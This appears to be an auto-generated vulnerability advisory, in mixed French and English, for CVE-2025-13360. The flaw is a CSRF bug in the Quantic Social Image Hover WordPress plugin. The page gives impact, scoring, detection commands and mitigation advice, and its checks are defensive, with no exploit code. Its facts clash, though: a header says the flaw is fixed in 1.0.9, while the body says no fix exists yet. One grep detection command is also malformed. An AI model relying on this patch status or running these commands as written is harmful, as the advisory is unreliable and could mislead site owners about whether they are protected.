Plateforme
wordpress
Composant
tw-image-hover-share
Corrigé dans
1.0.9
CVE-2025-13360 describes a Cross-Site Request Forgery (CSRF) vulnerability affecting the Quantic Social Image Hover plugin for WordPress. This flaw allows unauthenticated attackers to modify the plugin's settings, potentially leading to the injection of malicious web scripts. The vulnerability impacts versions 1.0.0 through 1.0.8, and a fix is expected to be released by the vendor.
The primary impact of this CSRF vulnerability lies in the ability of an attacker to manipulate the Quantic Social Image Hover plugin's configuration without authentication. By crafting a malicious request and tricking a site administrator into clicking a link or visiting a compromised page, an attacker can alter plugin settings. This could involve injecting arbitrary JavaScript code, redirecting users to phishing sites, or modifying the plugin’s behavior to serve malicious content. The blast radius extends to all users of the affected WordPress site, particularly administrators who are more likely to interact with plugin settings.
This vulnerability was publicly disclosed on 2025-12-05. Currently, there are no known public proof-of-concept exploits available. The vulnerability's CVSS score of 4.3 (MEDIUM) indicates a moderate probability of exploitation. It is not currently listed on the CISA KEV catalog.
WordPress websites utilizing the Quantic Social Image Hover plugin, particularly those with administrative access granted to multiple users or those lacking robust security practices, are at risk. Shared hosting environments where plugin updates are managed centrally may also be vulnerable if the plugin is not promptly updated across all sites.
• wordpress / composer / npm:
grep -r 'social_image_hover_settings_update' /var/www/html/wp-content/plugins/• wordpress / composer / npm:
wp plugin list --status=all | grep Quantic Social Image Hover• wordpress / composer / npm:
curl -I https://your-wordpress-site.com/wp-admin/admin-ajax.php?action=social_image_hover_settings_update | grep -i '200 ok'disclosure
Statut de l'Exploit
EPSS
0.02% (percentile 3%)
CISA SSVC
Vecteur CVSS
The immediate mitigation for CVE-2025-13360 is to upgrade the Quantic Social Image Hover plugin to a patched version as soon as it becomes available. Until a patch is released, consider implementing temporary workarounds such as restricting access to plugin settings pages to authenticated administrators only. Web Application Firewalls (WAFs) configured to detect and block CSRF attacks can also provide a layer of protection. Regularly review plugin settings for any unauthorized changes. After upgrading, verify the plugin's settings have been restored to their intended configuration and that no malicious scripts have been injected.
Aucun correctif connu n'est disponible. Veuillez examiner en profondeur les détails de la vulnérabilité et mettre en œuvre des mesures d'atténuation en fonction de la tolérance au risque de votre organisation. Il peut être préférable de désinstaller le logiciel affecté et de trouver un remplacement.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
CVE-2025-13360 is a Cross-Site Request Forgery (CSRF) vulnerability in the Quantic Social Image Hover WordPress plugin, allowing attackers to modify settings via forged requests.
If you are using Quantic Social Image Hover versions 1.0.0 through 1.0.8, you are potentially affected by this vulnerability.
Upgrade the Quantic Social Image Hover plugin to the latest available version as soon as a patch is released. Implement temporary workarounds like restricting access to plugin settings until then.
As of the current disclosure date, there are no confirmed reports of active exploitation, but the vulnerability's nature makes it a potential target.
Refer to the plugin developer's website or the WordPress plugin repository for the official advisory and patch release.
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.